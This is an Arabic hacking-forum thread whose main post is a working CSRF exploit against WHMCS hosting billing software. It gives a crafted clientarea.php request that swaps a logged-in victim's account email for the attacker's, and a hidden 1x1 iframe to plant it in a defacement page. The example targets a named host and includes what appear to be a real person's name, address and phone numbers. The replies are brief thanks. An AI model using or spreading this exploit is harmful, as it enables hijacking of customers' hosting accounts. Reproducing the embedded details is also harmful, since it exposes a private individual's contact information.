1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

WHMCS [CSRF] All Versions (0day)

الموضوع في '[ ثــغـرات الأعــضــاء]' بواسطة G.e.r.n.a.s, بتاريخ ‏26 يونيو 2013.

كاتب الموضوع : G.e.r.n.a.s المشاهدات : 947 الردود : 3 ‏26 يونيو 2013
حالة الموضوع:
مغلق
  1. غير متصل

    G.e.r.n.a.s
    rank
    Developer

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    مبرمج
    الإقامة:

    كود PHP:
    ################################################## #########################

    # Exploit Title: WHMCS [CSRF] All Versions (0day)
    # Team: MaDLeeTs
    # Software Link: http://www.whmcs.com
    # Version: All
    # Site: http://www.MaDLeeTs.com
    # Email: LeeTHaXorY7Mail.com

    #######################Video###################### #################

    http://vimeo.com/63686629

    ################################################## #########################

    https://[TARGETS WEBHOST]/clientarea.php?action=details&save=true&firstname= Max&lastname=Fong&companyname=Antswork+Communicati ons+Sdn+Bhd&email=[ YOUR EMAIL ADDRESS ]&address1=B10-12,+Endah+Puri+Condominium,&address2=Jalan+3/149E,+Taman+Seri+Endah+&city=Seri+Petaling&state=W ilayah+Persekutuan&postcode=57000&country=MY&phone number=0060390592663&paymentmethod=none&billingcid =0&customfield[1]=max@antswork.com&customfield[2]=&customfield[3]=+6019.3522298&customfield[4]=+603.90578663&customfield[5]=Laura+-+0192182996&customfield[6]=Owner+of+Company&customfield[7]=&customfield[8]=&customfield[9]=Old+Contact+Details:+A2-11-8,+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpu r+Tel:+603.86560268+Fax:+603.8​6560768

    ########################iFrame Code To Add On Deface##############################

    <IFRAME src="[Exploit Code]" width="1" height="1" scrolling="auto" frameborder="0"></iframe>

    Example:
    <
    IFRAME src="https://manage.fatservers.my/clientarea.php?action=details&save=true&firstname= Max&lastname=Fong&companyname=Antswork+Communicati ons+Sdn+Bhd&email=LeeTHaxor%40Y7Mail.Com&address1= B10-12%2C+Endah+Puri+Condominium%2C&address2=Jalan+3%2 F149E%2C+Taman+Seri+Endah+&city=Seri+Petaling&stat e=Wilayah+Persekutuan&postcode=57000&country=MY&ph onenumber=0060390592663&paymentmethod=none&billing cid=0&customfield%5B1%5D=max%40antswork.com&custom field%5B2%5D=&customfield%5B3%5D=%2B6019.3522298&c ustomfield%5B4%5D=%2B603.90578663&customfield%5B5% 5D=Laura+-+0192182996&customfield%5B6%5D=Owner+of+Company&cu stomfield%5B7%5D=&customfield%5B8%5D=&customfield% 5B9%5D=Old+Contact+Details%3A+A2-11-8%2C+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lum pur+Tel%3A+603.86560268+Fax%3A​+603.86560768" width="1" height="1" scrolling="auto" frameborder="0"></iframe>

    ################################################## #########################
    All you need to do is add it into your Deface page and make your target view the deface pageHe MUST loggin 1st into his clientarea in order to get his email updated.
    ################################################## #########################
    Greetz to H4x0rL1f3 KhantastiC HaXor H4x0r HuSsY b0x Invectus Shadow008 Neo HaXor Hitcher Dr.Z0mbie Hmei7 phpBugz MindCracker |
    c0rrupt r00x Pain006 Ment@l Mind M4DSh4k H1d@lG0 AlphaSky 3thicaln00b e0fx madc0de |
    makman DeaTh AnGeL Lnxr00t x3o-1337 Tor Demon T4p10N AL.MaX HaCkEr | | ThaRude ThaDark |
    Evil-DZ H3ll-dz Over-3xp1r3 Cyber Army Pakistan Cyber Army And All MaDLeeTs TeaM Members
    ################################################## #########################

    http://www.MaDLeeTs.com

    ################################################## #########################


    I hope my exploit would be addedThank you WHMCS CSRF Versions Vulnerability

     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    ارهابي انا
    rank
    Developer

    عضو منذ:
    ‏25 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: WHMCS [CSRF] All Versions (0day)

    يعطيك العافيه يابطل واصل ..^^​
     


  4. غير متصل

    mr.mourad <span style="font-weight: bold; text-shadow: #BBBB
    V • I • P

    عضو منذ:
    ‏8 يوليو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: WHMCS [CSRF] All Versions (0day)

    يعطيك العافية اخي شكراً جزيلاً :{1}:
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...